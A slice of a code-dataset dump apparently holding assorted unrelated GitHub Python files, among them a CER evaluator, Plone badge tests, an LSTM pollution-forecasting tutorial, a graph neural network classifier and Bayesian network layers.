\n\n","repo_name":"dixon777/variableNeutralLineManipulator","sub_path":"variable_neutral_line_manipulator/gui/gui_common/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3081,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"21150279341","text":"f = open('sum_of_digits')\r\nN = int(f.readline())\r\nresult_arr = []\r\nfor i in range(N):\r\n sum_digits = 0\r\n arr = f.readline().split()\r\n sum_number = int(arr[0]) * int(arr[1]) + int(arr[2])\r\n for ch in str(sum_number):\r\n sum_digits += int(ch)\r\n result_arr.append(sum_digits)\r\n\r\nfor ch in result_arr:\r\n print(ch, end=' ')\r\n","repo_name":"alchupin/CodeAbbey","sub_path":"abbey_sum_of_digits.py","file_name":"abbey_sum_of_digits.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"21554763878","text":"import argparse\nimport evaluate\nimport os\nimport pandas as pd\nimport json\nfrom typing import List\nfrom tqdm import tqdm\n\nfrom utils.CER import CER, PER\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"-f\", \"--result-file\",\n type=str,\n required=True,\n help=\"Json file\"\n )\n parser.add_argument(\n \"--ref-text-key\",\n type=str,\n default='lyric',\n help=\"\"\n )\n parser.add_argument(\n \"--pred-text-key\",\n type=str,\n default='inference',\n help=\"\"\n )\n parser.add_argument(\n '--ref-timestamp-key',\n type=str,\n default='onset_offset'\n )\n parser.add_argument(\n '--pred-timestamp-key',\n type=str,\n default='inference_onset_offset'\n )\n\n args = parser.parse_args()\n return args\n\ndef is_english(char) -> bool:\n ascii_value = ord(char)\n return (ascii_value >= 65 and ascii_value <= 90) or (ascii_value >= 97 and ascii_value <= 122)\n\ndef remove_english(sentence: str):\n result = ''\n for char in sentence:\n if is_english(char) == False:\n result += char\n \n return result\n\n\ndef compute_cer(\n reference: List[str], \n prediction: List[str],\n is_per: bool=False\n):\n metric_name = 'PER' if is_per else 'CER'\n\n CER_weighted = 0.0\n op_count = {'substitution': 0,\n 'insertion': 0,\n 'deletion': 0,\n 'correct': 0}\n for ref, pred in tqdm(zip(reference, prediction)):\n # Remove All English Characters\n pred = remove_english(pred)\n\n if is_per:\n cer, nb_map = PER(hypothesis=pred,\n reference=ref)\n else:\n try:\n cer, nb_map = CER(hypothesis=list(pred),\n reference=list(ref))\n except:\n cer, nb_map = CER(hypothesis=[],\n reference=list(ref))\n \n CER_weighted += cer\n op_count['substitution'] += nb_map['S']\n op_count['insertion'] += nb_map['I']\n op_count['deletion'] += nb_map['D']\n op_count['correct'] += nb_map['C']\n \n print('=' * 30)\n print(f\"{metric_name} (Weighted):\", CER_weighted / len(reference))\n print(\"Wrong Operations:\")\n for key, value in op_count.items():\n print(f\"{key}: {value}\")\n print('-' * 30)\n # weighted evaluate\n if is_per:\n CER_unweighted = (op_count['substitution'] + op_count['deletion'] + op_count['insertion']) / (op_count['substitution'] + op_count['deletion'] + op_count['correct'])\n else:\n metric = evaluate.load(\"cer\")\n CER_unweighted = metric.compute(references=reference,\n predictions=prediction)\n \n print(f\"{metric_name} (Unweighted):\", CER_unweighted)\n print(\"=\" * 30)\n\n\n\ndef main():\n args = parse_args()\n\n assert os.path.exists(args.result_file)\n with open(args.result_file, 'r') as f:\n results = json.load(f)\n\n # CER\n compute_cer(reference=[result[args.ref_text_key] for result in results],\n prediction=[result[args.pred_text_key] for result in results])\n # PER\n compute_cer(reference=[result[args.ref_text_key] for result in results],\n prediction=[result[args.pred_text_key] for result in results],\n is_per=True)\n \nif __name__ == \"__main__\":\n main()","repo_name":"navi0105/LyricAlignment","sub_path":"evaluate_transcript.py","file_name":"evaluate_transcript.py","file_ext":"py","file_size_in_byte":3445,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"674435034","text":"import heapq\n\ndef solution(scoville, K):\n count = 0\n heapq.heapify(scoville)\n\n while 1:\n if len(scoville) <= 1 and scoville[0] < K:\n count = -1\n break\n if scoville[0] >= K:\n break\n new = heapq.heappop(scoville) + (heapq.heappop(scoville) * 2)\n heapq.heappush(scoville, new)\n count += 1\n\n return count\n\n","repo_name":"ChaeHyeonU/Algorithm","sub_path":"PG_Heap1.py","file_name":"PG_Heap1.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"72504294839","text":"from collective.badge.testing import COLLECTIVE_BADGE_INTEGRATION_TESTING\nfrom plone import api\nfrom plone.testing import z2\nfrom plone.app.testing import SITE_OWNER_NAME\nimport unittest\n\n\nclass TestBadge(unittest.TestCase):\n layer = COLLECTIVE_BADGE_INTEGRATION_TESTING\n\n def setUp(self):\n self.app = self.layer['app']\n self.portal = self.layer['portal']\n self.request = self.layer['request']\n z2.login(self.app['acl_users'], SITE_OWNER_NAME)\n self.user1 = api.user.create(\n email='user1@example.com',\n username='user1',\n password='123'\n )\n self.badge = api.content.create(\n container=self.portal,\n type='Badge',\n id='test-badge',\n title='Test Badge',\n )\n\n def test_create_badge(self):\n self.assertTrue('test-badge' in self.portal)\n badge = self.portal['test-badge']\n self.assertEquals('Badge', badge.portal_type)\n\n def test_render_badge_view(self):\n html = self.badge()\n self.assertTrue('Test Badge' in html)\n\n def test_assign_badge_to_user(self):\n badge = self.badge\n badge.assign_to_user('user1')\n self.assertTrue(badge.is_assigned_to_user('user1'))\n\n badge.remove_from_user('user1')\n self.assertFalse(badge.is_assigned_to_user('user1'))\n\n def test_list_active_users(self):\n badge = self.badge\n self.assertEqual(badge.list_active_users(), [])\n\n badge.assign_to_user('user1')\n self.assertEqual(badge.list_active_users(), ['user1'])\n\n def test_badges_for_user(self):\n from ..api import badges_for_user\n self.assertEquals(len(badges_for_user('user1')), 0)\n\n self.badge.assign_to_user('user1')\n self.assertEquals(len(badges_for_user('user1')), 1)\n","repo_name":"collective/collective.badge","sub_path":"src/collective/badge/tests/test_badge.py","file_name":"test_badge.py","file_ext":"py","file_size_in_byte":1827,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"24071702731","text":"from .Block import *\nfrom TickHandler import handler as tickhandler\nimport globals as G\n\n\nclass FallingBlock(Block):\n def update(self, model, window):\n if not (x, y - 1, z) in model.world:\n tickhandler.run(self.reupdate, 1, args=[model, window])\n\n def reupdate(self, model, window):\n (x, y, z) = self.pos\n if not (x, y - 1, z) in model.world:\n if model.move_block(self.pos, (x, y - 1, z), immediate=False) != False:\n model.updateNexts((x, y, z))\n model.updateNexts((x, y - 1, z))\n elif not model.world[(x, y - 1, z)].isFullBlock():\n G.player.addToFreePlace(self.getDropBlock())\n\n def getDropBlock(self):\n return self.getDrop(None)\n","repo_name":"uuk0/mcpython-a-minecraft-clone-in-python","sub_path":"mods/mcpython/Blocks/fallingblock.py","file_name":"fallingblock.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"39323897731","text":"import os\nos.system('cls')\n\n# ساخت ارور دلخواه و تغییر آن به کمک وراثت\n\nclass NegetiveAgeError(Exception):\n def __init__(self, massage, age):\n self.massage = massage\n self.age = age\n\n\ndef check_age(age): \n if age < 0:\n raise NegetiveAgeError('Your age can not be negetive', age)\n return age * 2\n\n\nuser_age = int(input(\"enter your age: \"))\n\ntry:\n print(check_age(user_age))\nexcept NegetiveAgeError as e:\n print(e.massage, e.age)\n","repo_name":"VahidRajabi-2000-5/Exception-Handling","sub_path":"1_EH/6_EH.py","file_name":"6_EH.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"26174357279","text":"import requests\nfrom bs4 import BeautifulSoup\nurl=\"http://quotes.toscrape.com/\"\nresponse=requests.get(url)\n\n#Parse text using lxml\nsoup=BeautifulSoup(response.text, \"lxml\")\n#print(soup)\n\n#All quotes have the tag \"span\" and the class \"text\"\nquotes=soup.find_all(\"span\", class_=\"text\")\n\n#All authors have the tag \"small\" and the class \"author\"\nauthors=soup.find_all(\"small\", class_=\"author\")\n\n#All authors have the tag \"a\" and the class \"tag\"\n#But there can be more than one tag per quote, so we use the entire quote box\ntags=soup.find_all(\"div\", class_=\"tags\")\n\nfor i in range(0, len(quotes)):\n print(quotes[i].text)\n print(authors[i].text)\n quoteTags=tags[i].find_all(\"a\", class_=\"tag\")\n for quoteTag in quoteTags:\n print(quoteTag.text)\n\n","repo_name":"JacobRaymond/AutomatingWithPython","sub_path":"Isolate_Data.py","file_name":"Isolate_Data.py","file_ext":"py","file_size_in_byte":757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"17654508578","text":"EMAIL_INPUT = {\"tag\": \"input\", \"title\": \"E-mail*\", \"label\": \"email\", \"args\": {\"type\": \"email\", \"id\": \"email\", \"name\": \"email\", \"placeholder\": \"seuemail@email.com\"}}\nASSUNTO_INPUT = {\"tag\": \"input\", \"title\": \"Assunto*\", \"label\": \"assunto\", \"args\": {\"type\": \"text\", \"id\": \"assunto\", \"name\": \"assunto\", \"placeholder\": \"Assunto\"}}\nDESCRICAO_INPUT = {\"tag\": \"textarea\", \"title\": \"Descrição*\", \"label\": \"descricao\", \"args\": {\"rows\": \"2\", \"cols\": \"32\", \"name\": \"descricao\", \"id\": \"descricao\", \"placeholder\": \"Isso é uma descrição...\"}}\n\nCONTACT_TEXT = {\n \"title\": \"Fale conosco\",\n \"text\": [\n \"Lorem ipsum dolor sit amet consectetur adipisicing elit. Sequi odit quibusdam hic exercitationem ut esse, quae consectetur facilis?\",\n ]\n}\n","repo_name":"yrnThiago/Desafio_2","sub_path":"app/constants/contato.py","file_name":"contato.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"la","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"10131775567","text":"#数据预处理\n#粗略的观察数据集会发现最开始的24小时PM2.5值都是NA,因此需要删除这部分数据,\n#对于其他时刻少量的缺省值利用Pandas中的fillna填充;同时需要整合日期数据,使其作为Pandas中索引(index)。 \n#下面的代码完成了以上的处理过程,同时去掉了原始数据中“No”列,并将列命名为更清晰的名字。\nfrom pandas import read_csv\nfrom datetime import datetime\n# load data\ndef parse(x):\n return datetime.strptime(x, '%Y %m %d %H')\t\ndataset = read_csv('F:raw.csv', parse_dates = [['year', 'month', 'day', 'hour']], index_col=0, date_parser=parse)\ndataset.drop('No', axis=1, inplace=True)\n# manually specify column names\ndataset.columns = ['pollution', 'dew', 'temp', 'press', 'wnd_dir', 'wnd_spd', 'snow', 'rain']\ndataset.index.name = 'date'\n# mark all NA values with 0\ndataset['pollution'].fillna(0, inplace=True)\n# drop the first 24 hours\ndataset = dataset[24:]\n# summarize first 5 rows\nprint(dataset.head(5))\n# save to file\ndataset.to_csv('pollution.csv')\n\n\n#处理后的数据存储在“pollution.csv”文件中\n#对除了类别型特性“风速”的每一列数据分别绘图\nfrom pandas import read_csv\nfrom matplotlib import pyplot\n# load dataset\ndataset = read_csv('pollution.csv', header=0, index_col=0)\nvalues = dataset.values\n# specify columns to plot\ngroups = [0, 1, 2, 3, 5, 6, 7]\ni = 1\n# plot each column\npyplot.figure()\nfor group in groups:\n pyplot.subplot(len(groups), 1, i)\n pyplot.plot(values[:, group])\n pyplot.title(dataset.columns[group], y=0.5, loc='right')\n i += 1\npyplot.show()\n\n\n#多变量LSTM预测模型\n#数据准备\n#采用LSTM模型时,第一步需要对数据进行适配处理,\n#其中包括将数据集转化为有监督学习问题和归一化变量(包括输入和输出值),\n#使其能够实现通过前一个时刻(t-1)的污染数据和天气条件预测当前时刻(t)的污染\n\n#利用sklearn的预处理模块对类别特征“风向”进行编码,当然也可以对该特征进行one-hot编码。 \n#接着对所有的特征进行归一化处理,\n#将数据集转化为有监督学习问题,同时将需要预测的当前时刻(t)的天气条件特征移除,\n\n# convert series to supervised learning转为有监督学习(函数)\ndef series_to_supervised(data, n_in=1, n_out=1, dropnan=True):\n n_vars = 1 if type(data) is list else data.shape[1]\n df = DataFrame(data)\n cols, names = list(), list()\n # input sequence (t-n, ... t-1)\n for i in range(n_in, 0, -1):\n cols.append(df.shift(i))\n names += [('var%d(t-%d)' % (j+1, i)) for j in range(n_vars)]\n # forecast sequence (t, t+1, ... t+n)\n for i in range(0, n_out):\n cols.append(df.shift(-i))\n if i == 0:\n names += [('var%d(t)' % (j+1)) for j in range(n_vars)]\n else:\n names += [('var%d(t+%d)' % (j+1, i)) for j in range(n_vars)]\n # put it all together\n agg = concat(cols, axis=1)\n agg.columns = names\n # drop rows with NaN values\n if dropnan:\n agg.dropna(inplace=True)\n return agg\n\n# load dataset\ndataset = read_csv('pollution.csv', header=0, index_col=0)\nvalues = dataset.values\n# integer encode direction\nencoder = LabelEncoder()\nvalues[:,4] = encoder.fit_transform(values[:,4])\n# ensure all data is float\nvalues = values.astype('float32')\n# normalize features\nscaler = MinMaxScaler(feature_range=(0, 1))\nscaled = scaler.fit_transform(values)\n# frame as supervised learning\nreframed = series_to_supervised(scaled, 1, 1)\n# drop columns we don't want to predict\nreframed.drop(reframed.columns[[9,10,11,12,13,14,15]], axis=1, inplace=True)\nprint(reframed.head())\n\n#构造模型\n#\n#最终将输入(X)改造为LSTM的输入格式,即[samples,timesteps,features]。\n\n# 将数据集进行划分,然后将训练集和测试集划分为输入和输出变量,\nvalues = reframed.values\nn_train_hours = 365 * 24\ntrain = values[:n_train_hours, :]\ntest = values[n_train_hours:, :]\n# split into input and outputs\ntrain_X, train_y = train[:, :-1], train[:, -1]\ntest_X, test_y = test[:, :-1], test[:, -1]\n# reshape input to be 3D [samples, timesteps, features]\ntrain_X = train_X.reshape((train_X.shape[0], 1, train_X.shape[1]))\ntest_X = test_X.reshape((test_X.shape[0], 1, test_X.shape[1]))\nprint(train_X.shape, train_y.shape, test_X.shape, test_y.shape)\n\n\n#搭建LSTM模型 \n#LSTM模型中,隐藏层有50个神经元,输出层1个神经元(回归问题),\n#输入变量是一个时间步(t-1)的特征,损失函数采用Mean Absolute Error(MAE),优化算法采用Adam,模型采用50个epochs并且每个batch的大小为72。 \n#最后,在fit()函数中设置validation_data参数,记录训练集和测试集的损失,并在完成训练和测试后绘制损失图。\n\n# 设计网络\nmodel = Sequential()\nmodel.add(LSTM(50, input_shape=(train_X.shape[1], train_X.shape[2])))\nmodel.add(Dense(1))\nmodel.compile(loss='mae', optimizer='adam')\n# fit network\nhistory = model.fit(train_X, train_y, epochs=50, batch_size=72, validation_data=(test_X, test_y), verbose=2, shuffle=False)\n# plot history\npyplot.plot(history.history['loss'], label='train')\npyplot.plot(history.history['val_loss'], label='test')\npyplot.legend()\npyplot.show()\n\n\n#模型评估\n# make a prediction\nyhat = model.predict(test_X)\ntest_X = test_X.reshape((test_X.shape[0], test_X.shape[2]))\n# invert scaling for forecast\ninv_yhat = concatenate((yhat, test_X[:, 1:]), axis=1)\ninv_yhat = scaler.inverse_transform(inv_yhat)\ninv_yhat = inv_yhat[:,0]\n# invert scaling for actual\ntest_y = test_y.reshape((len(test_y), 1))\ninv_y = concatenate((test_y, test_X[:, 1:]), axis=1)\ninv_y = scaler.inverse_transform(inv_y)\ninv_y = inv_y[:,0]\n# calculate RMSE\nrmse = sqrt(mean_squared_error(inv_y, inv_yhat))\nprint('Test RMSE: %.3f' % rmse)\n\n\n","repo_name":"hitaitengteng/little_test_python","sub_path":"lstm_1.py","file_name":"lstm_1.py","file_ext":"py","file_size_in_byte":5861,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"19952933349","text":"from .BDefines import *\nimport platform\n\ndef GetSystemPlatform():\n (bits, linkage) = platform.architecture()\n system = platform.system()\n version = platform.version()\n \n systemL = system.lower()\n current = None\n if systemL == 'windows':\n current = BPlatformEnum.Windows\n elif systemL == 'linux':\n current = BPlatformEnum.Linux\n elif systemL == 'darwin':\n current = BPlatformEnum.OSX\n else:\n raise ValueError(f'BConstant->GetSystemPlatform exception, system: {system}')\n return current\n\nBConstSystemPlatform = GetSystemPlatform()","repo_name":"5yaojing/jenkinstest","sub_path":"python/framework/basic/BConstant.py","file_name":"BConstant.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"73277292920","text":"import sys\nimport torch\nfrom tqdm import tqdm as tqdm\nfrom .meter import AverageValueMeter\nfrom .metrics_myself import Metrics\nimport numpy as np\n\nclass Epoch:\n\n def __init__(self, model, loss, metrics, stage_name, classes,device='cpu', verbose=True):\n self.model = model\n self.loss = loss\n self.metrics = metrics\n self.stage_name = stage_name\n self.classes=classes\n self.verbose = verbose\n self.device = device\n\n self._to_device()\n\n def _to_device(self):\n self.model.to(self.device)\n self.loss.to(self.device)\n # for metric in self.metrics:\n # metric.to(self.device)\n\n def _format_logs(self, logs):\n str_logs = ['{} - {:.4}'.format(k, v) for k, v in logs.items()]\n s = ', '.join(str_logs)\n return s\n\n def batch_update(self, x, y):\n raise NotImplementedError\n\n def on_epoch_start(self):\n pass\n\n def run(self, dataloader):\n\n self.on_epoch_start()\n\n logs = {}\n loss_meter = AverageValueMeter()\n metrics_meters = {metric: AverageValueMeter() for metric in self.metrics}\n\n\n all_hist_gpu=Metrics(num_classes=self.classes)\n all_hist_gpu.to(self.device)\n\n with tqdm(dataloader, desc=self.stage_name, file=sys.stdout, disable=not (self.verbose)) as iterator:\n for x, y in iterator:\n x, y = x.to(self.device), y.to(self.device)\n loss, y_pred = self.batch_update(x, y)\n\n # update loss logs\n loss_value = loss.cpu().detach().numpy()\n loss_meter.add(loss_value)\n loss_logs = {self.loss.__name__: loss_meter.mean}\n logs.update(loss_logs)\n\n all_hist_gpu.add_batch(y_pred,y)\n\n if self.stage_name ==\"train\":\n batch_result=all_hist_gpu.evaluate()\n metrics_meters_logs={}\n\n for metric in self.metrics:\n metrics_meters[metric].add(batch_result[metric])\n metrics_meters_logs[metric]=metrics_meters[metric].mean\n all_hist_gpu.reset()\n logs.update(metrics_meters_logs)\n\n if self.verbose:\n s = self._format_logs(logs)\n iterator.set_postfix_str(s)\n\n if self.stage_name ==\"valid\":\n valid_result=all_hist_gpu.evaluate()\n logs.update(valid_result)\n\n return logs\n\n\nclass TrainEpoch(Epoch):\n\n def __init__(self, model, loss, metrics, optimizer,classes,lr,max_iter,device='cpu', verbose=True):\n super().__init__(\n model=model,\n loss=loss,\n metrics=metrics,\n stage_name='train',\n classes=classes,\n device=device,\n verbose=verbose,\n )\n self.optimizer = optimizer\n self.iter=0\n self.max_iter=max_iter\n self.lr=lr\n\n def on_epoch_start(self):\n self.model.train()\n\n def batch_update(self, x, y):\n self.optimizer.zero_grad()\n prediction = self.model.forward(x)\n loss = self.loss(prediction, y)\n loss.backward()\n\n #poly learning rate\n self.optimizer.param_groups[0]['lr']=self.lr*np.power((1-self.iter/self.max_iter),0.9)\n self.iter+=1\n\n self.optimizer.step()\n return loss, prediction\n\n\nclass ValidEpoch(Epoch):\n\n def __init__(self, model, loss, metrics, classes,device='cpu', verbose=True):\n super().__init__(\n model=model,\n loss=loss,\n metrics=metrics,\n stage_name='valid',\n classes=classes,\n device=device,\n verbose=verbose,\n )\n\n def on_epoch_start(self):\n self.model.eval()\n\n def batch_update(self, x, y):\n with torch.no_grad():\n prediction = self.model.forward(x)\n loss = self.loss(prediction, y)\n return loss, prediction\n","repo_name":"Zhaoguanhua/RS_Segmentation-pytorch","sub_path":"utils_me/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3996,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"17849423229","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport dgl\nfrom sklearn.model_selection import train_test_split\nfrom utils.gcn import HGCN\nfrom utils.helper import logging_helper, earlystop_helper\nfrom utils.metrics import get_accuracy\n\nDIM_INITIAL_FEATURE = 3000 # Dim of initial feature for each node in graph\n\nclass HGCNModel:\n def __init__(self, graph_list:list, buf, target_index:list, feature_list:list=None, dim_hidden:int=200, num_labels:int=2, load_path:str=None, device:str='cuda:0') -> None:\n self.device = torch.device(device)\n self.buf = buf\n \n if feature_list is None:\n feature_list = [torch.randn(graph.number_of_nodes(), DIM_INITIAL_FEATURE).to(self.device) for graph in graph_list]\n elif not len(graph_list) == len(feature_list):\n raise ValueError('graph_list and feature_list must have the same length')\n self.graph_list = [graph.to(self.device) for graph in graph_list]\n self.feature_list = feature_list\n \n self.model = HGCN(num_graph=len(graph_list), target_index=target_index, dim_in=self.feature_list[0].shape[1], dim_hidden=dim_hidden, dim_out=num_labels).to(self.device)\n if load_path is not None:\n self.model.load_state_dict(torch.load(load_path))\n \n def train(self, train_index:torch.Tensor, train_label:torch.Tensor, model_name:str, val_split:bool=True, num_epochs:int=100, lr:float=0.01, early_stop:int=10):\n if val_split:\n train_index, val_index, train_label, val_label = train_test_split(train_index, train_label, test_size=0.2, random_state=42)\n \n if not isinstance(train_label, torch.Tensor):\n train_label = torch.tensor(train_label, dtype=torch.long).to(self.device)\n if not isinstance(val_label, torch.Tensor):\n val_label = torch.tensor(val_label, dtype=torch.long).to(self.device)\n \n loss_func = nn.CrossEntropyLoss()\n optimizer = torch.optim.Adam(self.model.parameters(), lr=lr)\n scheduler = torch.optim.lr_scheduler.LambdaLR(optimizer, lr_lambda=lambda e: 0.9**e)\n \n logging = logging_helper()\n logging.register('loss')\n logging.register('train_acc')\n if val_split:\n logging.register('val_acc')\n earlystopping = earlystop_helper(early_stop, mode='max')\n\n for _ in range(num_epochs):\n self.model.train()\n \n logits = self.get_logits(train_index)\n loss = loss_func(logits, train_label)\n \n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n scheduler.step()\n \n train_acc = get_accuracy(train_label, logits.argmax(dim=1))\n \n # log\n logging.log('loss', loss.cpu().item())\n logging.log('train_acc', train_acc.cpu().item())\n \n # val\n if val_split:\n self.model.eval()\n logits = self.get_logits(val_index)\n val_acc = get_accuracy(val_label, logits.argmax(dim=1))\n # log\n logging.log('val_acc', val_acc.cpu().item())\n \n if val_split:\n flag = earlystopping.update(val_acc)\n if flag == 1:\n self.save(f'model/hgcn/{model_name}.pkl')\n elif flag == -1:\n logging.step_output(refresh=False)\n break\n \n logging.step_output()\n \n self.load(f'model/hgcn/{model_name}.pkl')\n \n def get_logits(self, index:torch.Tensor):\n logits = self.model(self.graph_list, self.feature_list)\n return logits[index]\n \n def eval(self, index:torch.Tensor):\n logits = self.get_logits(index)\n predict = logits.argmax(dim=1)\n \n return predict\n \n def load(self, load_path:str):\n self.model.load_state_dict(torch.load(load_path))\n \n def save(self, save_path:str):\n torch.save(self.model.state_dict(), save_path)","repo_name":"CarlKilhart/Heterogeneous_Text_Classification","sub_path":"codes/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":4120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"16030846038","text":"import math\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass Gaussian(object):\n def __init__(self, mu, rho):\n super().__init__()\n self.mu = mu.cuda()\n self.rho = rho.cuda()\n self.normal = torch.distributions.Normal(0,1)\n \n @property\n def sigma(self):\n return torch.log1p(torch.exp(self.rho))\n# return torch.clamp(self.rho,1e-8,1)\n\n def sample(self):\n epsilon = self.normal.sample(self.rho.size()).cuda()\n return self.mu + self.sigma * epsilon\n\nclass AttentionLinear(nn.Module):\n def __init__(self, in_features):\n super().__init__()\n self.in_features = in_features\n\n #weight init\n self.weight = nn.Parameter(torch.Tensor(in_features).normal_(0,1))\n self.affine_1 = nn.Parameter(torch.Tensor(1).normal_(0,1))\n self.affine_2 = nn.Parameter(torch.Tensor(1).normal_(0,1))\n\n def forward(self, saver_std, trainer_std, attention, s):\n weight = self.weight * attention\n affine_1, affine_2 = self.affine_1, self.affine_2\n a1 = torch.matmul(trainer_std, weight) * affine_1\n a2 = torch.matmul(saver_std, weight) * affine_2\n mask = torch.sigmoid(s*(a1+a2))\n return mask\n\n\nclass BayesianLinear(nn.Module):\n def __init__(self, in_features, out_features, init_type = 'random', rho_init = -5):\n super().__init__()\n self.in_features = in_features\n self.out_features = out_features\n \n if init_type == 'random':\n \n min_value_mu = -0.2\n max_value_mu = +0.2\n \n else:\n \n min_value_mu = 0\n max_value_mu = 0\n \n min_value_rho = 3\n max_value_rho = 3\n \n # Weight parameters\n #self.weight_mu = nn.Parameter(torch.Tensor(out_features, in_features).uniform_(-0.2, 0.2))\n self.weight_mu = nn.Parameter(torch.Tensor(out_features, in_features))\n nn.init.kaiming_normal_(self.weight_mu)\n\n #self.weight_rho = nn.Parameter(torch.Tensor(out_features, in_features).uniform_(-2.783,-2.783))\n self.weight_rho = nn.Parameter(torch.Tensor(out_features, in_features).uniform_(rho_init,rho_init))\n #self.weight_rho = nn.Parameter(torch.Tensor(out_features, in_features).uniform_(0.06,0.06))\n self.weight = Gaussian(self.weight_mu, self.weight_rho)\n\n # Bias parameters\n self.bias_mu = nn.Parameter(torch.Tensor(out_features).uniform_(-0.2, 0.2))\n\n #self.bias_rho = nn.Parameter(torch.Tensor(out_features).uniform_(-2.783,-2.783))\n self.bias_rho = nn.Parameter(torch.Tensor(out_features).uniform_(rho_init,rho_init))\n #self.bias_rho = nn.Parameter(torch.Tensor(out_features).uniform_(0.06,0.06))\n self.bias = Gaussian(self.bias_mu, self.bias_rho)\n\n\n def forward(self, input, sample=False):\n if self.training or sample:\n weight = self.weight.sample()\n bias = self.bias.sample()\n else:\n weight = self.weight.mu\n bias = self.bias.mu\n\n return F.linear(input, weight, bias)\n\n def variance_init(self):\n \n min_value_rho = -2.783\n max_value_rho = -2.783\n \n self.weight_rho.data = torch.Tensor(self.out_features, self.in_features).uniform_(min_value_rho,max_value_rho).cuda() # sigma >= 0\n self.bias_rho.data = torch.Tensor(self.out_features).uniform_(min_value_rho,max_value_rho).cuda()\n\nclass BayesianNetwork(nn.Module):\n def __init__(self, inputsize, taskcla, init_type = 'random', rho_init = -5):\n super().__init__()\n\n ncha,size,_=inputsize\n self.taskcla=taskcla\n\n self.l1 = BayesianLinear(28*28, 400, init_type, rho_init)\n self.a1 = AttentionLinear(28*28)\n self.l2 = BayesianLinear(400, 400, init_type, rho_init)\n self.a2 = AttentionLinear(400)\n self.l3 = BayesianLinear(400, 10, init_type, rho_init)\n self.a3 = AttentionLinear(10)\n self.layer_arr = [self.l1, self.l2, self.l3, self.a1, self.a2, self.a3]\n# self.layer_arr = [self.l1, self.l2, ]\n\n\n def forward(self, x, sample=False, saver_net = None, attention = False, s = 1):\n # def forward(self, input, saver_std, trainer_std, attention, s)\n x = x.view(-1, 28*28)\n x = F.relu(self.l1(x, sample))\n saver_std = torch.log1p(torch.exp(self.l1.weight_rho))\n if attention:\n saver_std = torch.log1p(torch.exp(saver_net.l1.weight_rho))\n trainer_std = torch.log1p(torch.exp(self.l1.weight_rho))\n mask = self.a1(x, saver_std, trainer_std, torch.ones(28*28), s)\n self.mask1 = mask\n x = x*mask\n x = F.relu(self.l2(x, sample))\n if attention:\n saver_std = torch.log1p(torch.exp(saver_net.l2.weight_rho))\n trainer_std = torch.log1p(torch.exp(self.l2.weight_rho))\n mask = self.a2(x, saver_std, trainer_std, mask, s)\n self.mask2 = mask\n x = x*mask\n x = self.l3(x, sample)\n if attention:\n saver_std = torch.log1p(torch.exp(saver_net.l3.weight_rho))\n trainer_std = torch.log1p(torch.exp(self.l3.weight_rho))\n mask = self.a3(x, saver_std, trainer_std, mask, s)\n self.mask3 = mask\n x = x*mask\n\n x = F.log_softmax(x, dim=1)\n return x\n \n def variance_init(self):\n \n self.l1.variance_init()\n self.l2.variance_init()\n self.l3.variance_init()\n \n def sample_elbo(self, data, target, BATCH_SIZE, samples=5, saver_net = None, attention = False, s = 1):\n # outputs = torch.zeros(samples, BATCH_SIZE, 10).to(DEVICE)\n outputs = torch.zeros(samples, BATCH_SIZE, 10).cuda()\n\n for i in range(samples):\n outputs[i] = self(data, sample=True, saver_net = saver_net, attention = attention, s = s)\n # print(outputs.type())\n\n loss = F.nll_loss(outputs.mean(0), target, reduction='sum')\n # loss = F.cross_entropy(outputs.mean(0), target, reduction='sum')\n\n return loss\n\n","repo_name":"csm9493/bayesian_continual_learning","sub_path":"core/networks.py","file_name":"networks.py","file_ext":"py","file_size_in_byte":6136,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"23021908624","text":"import xlrd\nimport os\nfilename=\"calcu_result283.xlsx\"\nfilepath=os.path.join(os.getcwd(),filename)\nexcel_data=xlrd.open_workbook(filepath)\nsheet=excel_data.sheet_by_index(0)\nsheet_rows=sheet.nrows\nprint(\"Excel的行数:\",sheet_rows)\nsheet_cols=sheet.ncols\nprint(\"Excle的列数:\",sheet_cols)\nfirst_row=sheet.row_values(0)\nprint(first_row)\ndef Read_data():\n x=[]\n for i in range(sheet_cols):\n if first_row[i] == 'payment_base':\n print(\"该字段的位置是:\",i)\n #payment_base_data=sheet.col_values(i,1)\n x.append(i)\n continue\n elif first_row[i] == 'hist_payment_base_projection':\n print(\"该字段的位置是:\",i)\n #hist_payment_base_projection_data = sheet.col_values(i,1)\n x.append(i)\n else:\n pass\n return x\na=Read_data()\nfor i in range(len(a)):\n 